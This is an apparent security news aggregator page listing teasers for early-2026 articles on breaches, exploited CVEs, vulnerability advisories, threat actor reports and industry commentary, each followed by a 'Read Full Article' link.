
D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)

Read Full Article → *(Covered by: CXSecurity Exploit Database, ExploitDB)*

This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent t...

Read Full Article →

The FBI has seized control of RAMP, a notorious cybercrime online forum that bragged to be the only place that allowed ransomware, and boasted over 14,000 active users. Now some of those users' details are likely to be in the hands of the police... Read more in my article on the Bitdefender blog.

Read Full Article →

In January 2026, Panera Bread suffered a data breach that exposed 14M records . After an attempted extortion failed, the attackers published the data publicly, which included 5.1M unique email addresses along with associated account information such as names, phone numbers and physical addresses....

Read Full Article →

Two Critical vulnerabilities in Ivanti’s popular mobile device management solution have been exploited in the wild in limited attacks Key takeaways: Patch Ivanti EPMM immediately. Both CVE-2026-1281 and CVE-2026-1340 have been exploited in the wild, though impact has been limited so far. Apply th...

Read Full Article →

Charlie, one of our readers, has forwarded an interesting phishing email. The email was sent to users of the Vivladi Webmail service. While not overly convincing, the email is likely sufficient to trick a non-empty group of users:

Read Full Article →

Key Takeaways: The Essentials of ROC vs. CTEM Modern enterprises face a constant flood of data from dozens of siloed security tools, creating a fragmented view of risk. Continuous threat exposure management (CTEM) offers a framework to bring exposures together from these tools, and a risk operati...

Read Full Article →

Six Predictions for the AI-Driven SOC – Subo Guha, Senior Vice President, Product Management, Stellar Cyber San Jose, Calif. – Jan. 30, 2026 Agentic AI as applied to the cybersecurity market is expected to grow from $738.2 million in 2024 to an estimated $1.73 billion The post Cybersecurity Predi...

Read Full Article →

ShinyHunters claims to have stolen millions of records from Match Group dating apps and Panera Bread, with very different consequences for users.

Read Full Article →

Introduction Mandiant has identified an expansion in threat activity that uses tactics, techniques, and procedures (TTPs) consistent with prior ShinyHunters-branded extortion operations. These operations primarily leverage sophisticated voice phishing (vishing) and victim-branded credential harve...

Read Full Article →

Introduction Mandiant is tracking a significant expansion and escalation in the operations of threat clusters associated with ShinyHunters-branded extortion. As detailed in our companion report, 'Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft' , these campaigns...

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jan. 30, 2026 –Watch the YouTube video 2026 is here, and the cloud security landscape is shifting rapidly. AI is reshaping how attackers operate, supply chains remain under siege, and the definition of The post...

Read Full Article →

In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-54529) and a double-free vulnerability (CVE-2025-31235) in the coreaudiod system daemon through a process I call knowledge-driven fuzzing. W...

Read Full Article →

Details are currently thin, but one thing is clear: paying more is unlikely to buy users meaningful privacy or less tracking.

Read Full Article →

Hazel reflects on how to find balance while staying informed, then delivers practical updates and insights on the latest cybersecurity threats.

Read Full Article →

Key Takeaways Compliance Breaks When Proof Lags Infrastructure Cloud compliance has changed. It is no longer an audit milestone. It is a continuous expectation. Boards demand visibility into regulatory exposure. Regulators expect evidence, not intent. Enterprise customers want assurance in real t...

Read Full Article →

Microsoft issued an emergency patch for a flaw attackers are using to slip malicious code past Office’s document security checks.

Read Full Article →

Microsoft has published three out-of-band (OOB) updates so far in January 2026. One of these updates was released to address a vulnerability, CVE-2026-21509, affecting Microsoft Office that has been reportedly exploited in the wild.

Read Full Article →

This Moltbot impersonation campaign is a case study in supply-chain risk, brand hijacking, and what happens when open source goes viral.

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jan. 29, 2026 –Watch the YouTube video The Mob Museum’s timely new exhibit “Digital Underworld” explores the rise of cybercrime as the newest frontier of organized crime, and it’s captured in a new The post The...

Read Full Article →

Cisco Talos has identified a new, regionally targeted campaign by UAT-8099 that leverages advanced persistence techniques and custom BadIIS malware variants to compromise IIS servers, particularly in Thailand and Vietnam.

Read Full Article →

A drop in exploitation and ransomware, but a spike in phishing and credential abuse, show why timely patching and robust MFA matter more than ever.

Read Full Article →

In episode 452, a London-based YouTuber wins a landmark court case against Saudi Arabia after his phone was hacked with Pegasus spyware — exposing how a single, seemingly harmless text message can turn a smartphone into a round-the-clock surveillance device. Plus, we go looking for professional h...

Read Full Article →

Introduction This week Google and partners took action to disrupt what we believe is one of the largest residential proxy networks in the world, the IPIDEA proxy network. IPIDEA’s proxy infrastructure is a little-known component of the digital ecosystem leveraged by a wide array of bad actors. Th...

Read Full Article →

What founders and CEOs are saying about this year’s conference Register – Steve Morgan, Editor-in-Chief Sausalito, Calif. – Jan. 27, 2026 For 35 years, RSAC has been a driving force behind the world’s cybersecurity community. The power of community is a key focus for the The post RSAC 2026—Where ...

Read Full Article →

Introduction The Google Threat Intelligence Group (GTIG) has identified widespread, active exploitation of the critical vulnerability CVE-2025-8088 in WinRAR, a popular file archiver tool for Windows, to establish initial access and deliver diverse payloads. Discovered and patched in July 2025, g...

Read Full Article →

Continuously discover and monitor all AI usage across your organization, including shadow AI, agents, browser plug-ins, and more, with Tenable One AI Exposure. Map complex AI workflows to reveal high-impact exposures and monitor compliance with security and AI acceptable use policies. Key takeawa...

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jan. 27, 2026 –Read the full story in Government Technology Dan Lohrmann is calling all government CISOs (and yes, CTOs, CIOs, CFOs, COOs, and even a few corporate CEOs can listen in): In The post Talking Point...

Read Full Article →

A headline feature introduced in the latest release of Windows 11, 25H2 is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and importantly, securable system to allow a local user to access administrator privileges only when necessary....

Read Full Article →

In this week's newsletter, Bill hammers home the old adage, "Know your environment" — even throughout alert fatigue.

Read Full Article →

Key Takeaways The Risk Introduced by Implicit Trust in Public Container Images Public container registries have become foundational to modern software development. A single docker pull can accelerate application delivery, standardize environments, and reduce operational friction across teams. How...

Read Full Article →

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Foxit PDF Editor, one in the Epic Games Store, and twenty-one in MedDream PACS.

Read Full Article →

We’re proud to share that Qualys has been recognized as a Leader and Outperformer in the 2025 GigaOm Radar Report for Cloud-Native Application Protection Platforms (CNAPP). This year’s evaluation underscores an important reality of the CNAPP market: while 18 vendors were evaluated, only a small s...

Read Full Article →

In November 2025, the Everest ransomware group claimed Under Armour as a victim and attempted to extort a ransom , alleging they had obtained access to 343GB of data. In January 2026, customer data from the incident was published publicly on a popular hacking forum , including 72M email addresses...

Read Full Article →

Oracle addresses 158 CVEs in its first quarterly update of 2026 with 337 patches, including 27 critical updates. Key takeaways: The first Critical Patch Update (CPU) for 2026, contains fixes for 158 unique CVEs in 337 security updates. 27 issues (8% of all patches) were assigned a critical severi...

Read Full Article →

Tenable Research has discovered a server-side request forgery (SSRF) vulnerability in Java’s handling of client certificates during a TLS handshake. In certain configurations, this can be abused to cause a denial-of-service (DoS) condition. Key takeaways Tenable Research identified a vulnerabilit...

Read Full Article →

Overview An out-of-bounds memory access vulnerability exists in the uncompressed decoder component of libheif . A maliciously crafted HEIF image can trigger a denial-of-service condition by causing the libheif library to crash or exhibit other unexpected behavior due to an out-of-bounds memory ac...

Read Full Article →

Overview The binary-parser library for Node.js contains a code injection vulnerability that may allow arbitrary JavaScript code execution if untrusted input is used to construct parser definitions. Versions prior to 2.3.0 are affected. The issue has been resolved by the developer in a public upda...

Read Full Article →

Overview The Open5GS WebUI component contains default hardcoded secrets used for security-sensitive operations, including JSON Web Token (JWT) signing. If these defaults are not changed, an attacker can forge valid authentication tokens and gain administrative access to the WebUI. This can result...

Read Full Article →

Overview A stack-based buffer overflow vulnerability exists in GNU libtasn1, a low-level ASN.1 parsing library. The issue is caused by unsafe string concatenation in the asn1_expand_octet_string function located in decoding.c . Under worst-case conditions, this results in a one-byte stack overflo...

Read Full Article →

Key Takeaways The Signals Are Loud, the Dashboards Are Full, Yet Decisive Action Remains Elusive By the end of 2025, many security leaders reached a quiet conclusion. The challenge was no longer a lack of tools, telemetry, or frameworks. Most enterprises already had all three. What remained unres...

Read Full Article →

Overview Kernel driver ProcessMonitorDriver.sys in Safetica's endpoint client x64, versions 10.5.75.0 and 11.11.4.0, allows for an unprivileged user to abuse an IOCTL path and terminate protected system processes. Description Safetica is a Data Loss Prevention (DLP) and Insider Risk Management (I...

Read Full Article →

Overview A Server-Side Template Injection (SSTI) vulnerability exists in the Genshi template engine due to unsafe evaluation of template expressions. Genshi processes template expressions using Python’s 'eval()’ and ‘exec()’ functions while allowing fallback access to Python built-in objects. If ...

Read Full Article →

Overview dr_flac , an open-source FLAC audio decoder, part of the dr_libs audio decoder toolset, contains an integer overflow vulnerability allowing for denial of service (DoS) when provided a specific crafted file. An attacker can exploit this vulnerability through providing a tool that uses dr_...

Read Full Article →

Overview Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io . The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Dr...

Read Full Article →

Overview A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application. W...

Read Full Article →

Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.

Read Full Article →

In this week’s newsletter, Martin examines the evolving landscape for 2026, highlighting key threats, emerging trends like AI-driven risks, and the continued importance of addressing familiar vulnerabilities.

Read Full Article →

Security Teams Rarely Stop to Reflect When a security program is working well, very little seems to happen. That is by design. There is no alert for the incident that was prevented. No visibility into the attack path that was quietly closed. No recognition for the vulnerability that was fixed bef...

Read Full Article →

We can no longer say that artificial intelligence is a "future risk", lurking somewhere on a speculative threat horizon. The truth is that it is a fast-growing cybersecurity risk that organizations are facing today. That's not just my opinion, that's also the message that comes loud and clear fro...

Read Full Article →

Key Takeaways The Current Picture Serverless adoption is accelerating as organizations prioritize speed, scalability, and operational efficiency. According to the Data Bridge Market Research’s Global Serverless Security Market Report, the serverless security market reached USD 12.08 billion in 20...

Read Full Article →

Overview Redmi Buds , a series of Bluetooth earbuds produced and sold by Xiaomi , contain an Information Leak vulnerability and a Denial of Service (DoS) vulnerability in versions 3 Pro through 6 Pro. An attacker within Bluetooth radio range can send specially crafted RFCOMM protocol interactions...

Read Full Article →

Written by: Nic Losby Introduction Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dati...

Read Full Article →

Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.

Read Full Article →

Exploit code has been published for CVE-2025-64155, a critical command injection vulnerability affecting Fortinet FortiSIEM devices. Key takeaways: CVE-2025-64155 is a critical operating system (OS) command injection vulnerability affecting Fortinet FortiSIEM. Fortinet vulnerabilities have histor...

Read Full Article →

Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family's tech — interests that eventually steered him toward the fast-paced world of digital investigations.

Read Full Article →

While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post descri...

Read Full Article →

With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context. As per the AOSP documentation, the mediacodec SELinux context is intended to be a constrain...

Read Full Article →

Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message...

Read Full Article →

Starting the year on a security-first note, Microsoft’s January 2026 Patch Tuesday resolves several vulnerabilities that could impact enterprise environments. Here’s a quick breakdown of what you need to know. Microsoft Patch Tuesday for January 2026 This month’s release addresses 115 vulnerabili...

Read Full Article →

Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical”.

Read Full Article →

In episode 83 of The AI Fix, Graham reveals he's taken up lying to LLMs, and shows how a journalist exposed AI bluffers with a made-up idiom. Meanwhile Mark invents a "Godwin's Law" for AI, and explains how to ruin any LLM with humus. Also in this episode, a marriage is declared invalid thanks to...

Read Full Article →

Have you ever stolen data, traded a hacking tool, or just lurked on a dark web forum believing that you are anonymous? If so, I might have some unsettling news for you. Read more in my article on the Hot for Security blog.

Read Full Article →

Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.

Read Full Article →

December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.

Read Full Article →

In October 2025, a reincarnation of the hacking forum BreachForums, which had previously been shut down multiple times, was taken offline by a coalition of law enforcement agencies . In the months leading up to the takedown, the site itself suffered a data breach that exposed a total of 672k uniq...

Read Full Article →